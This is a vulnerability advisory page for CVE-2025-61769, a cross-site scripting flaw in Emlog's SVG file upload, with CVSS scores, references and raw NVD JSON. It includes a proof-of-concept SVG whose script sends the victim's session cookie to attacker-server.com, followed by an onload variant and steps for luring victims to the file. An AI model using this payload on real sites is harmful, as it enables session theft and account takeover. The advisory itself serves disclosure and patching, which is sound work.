Security Vulnerability Report
CVE-2025-61769 CVSS 6.1 MEDIUM

Published: 2025-10-06 17:16:08
Last Modified: 2025-10-09 16:48:42

Description

Emlog is an open source website building system. A cross-site scripting (XSS) vulnerability in emlog up to and including version 2.5.22 allows authenticated remote attackers to inject arbitrary web script or HTML via the file upload functionality. An authenticated user can upload an .svg file containing JavaScript code that is later executed. Commit 052f9c4226b2c0014bcd857fec47677340b185b1 fixes the issue.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:* - VULNERABLE
Emlog <= 2.5.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<!-- CVE-2025-61769 PoC: Malicious SVG file for XSS via file upload in Emlog -->
<!-- Save the following content as malicious.svg and upload via Emlog's file upload feature -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="200" height="200">
  <script type="text/javascript">
    // XSS payload - steal session cookies
    var cookie = document.cookie;
    var img = new Image();
    img.src = "http://attacker-server.com/steal?cookie=" + encodeURIComponent(cookie);
    // Alternative: redirect to phishing page
    // window.location = "http://attacker-server.com/phishing";
    // Alternative: perform actions as the victim user
    // fetch('/admin/action', {method: 'POST', body: 'malicious=data'});
  </script>
  <rect x="0" y="0" width="200" height="200" fill="red"/>
  <text x="50" y="100" fill="white">Malicious SVG</text>
</svg>
<!-- Alternative simpler PoC using SVG event handler:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <circle cx="100" cy="100" r="50"/>
</svg>

Usage:
1. Login to Emlog as any authenticated user
2. Upload this malicious.svg file via the file upload functionality
3. Share the URL of the uploaded SVG with victim users
4. When the SVG is rendered in the browser, the JavaScript executes
-->

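References

https://github.com/emlog/emlog/commit/052f9c4226b2c0014bcd857fec47677340b185b1 (Patch)
https://github.com/emlog/emlog/security/advisories/GHSA-rrf5-pv68-gpjf (Exploit, Third Party Advisory)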

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61769", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:07.950", "lastModified": "2025-10-09T16:48:42.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog is an open source website building system. A cross-site scripting (XSS) vulnerability in emlog up to and including version 2.5.22 allows authenticated remote attackers to inject arbitrary web script or HTML via the file upload functionality. As an authenticated user it is possible to upload .svg file that contains JavaScript code that is later being executed. Commit 052f9c4226b2c0014bcd857fec47677340b185b1 fixes the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:*", "versionEndExcluding": "2.5.22", "matchCriteriaId": "BE0C705A-0E18-4783-A8D4-AD3F08F3B635"}]}]}], "references": [{"url": "https://github.com/emlog/emlog/commit/052f9c4226b2c0014bcd857fec47677340b185b1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/emlog/emlog/security/advisories/GHSA-rrf5-pv68-gpjf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/emlog/emlog/security/advisories/GHSA-rrf5-pv68-gpjf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}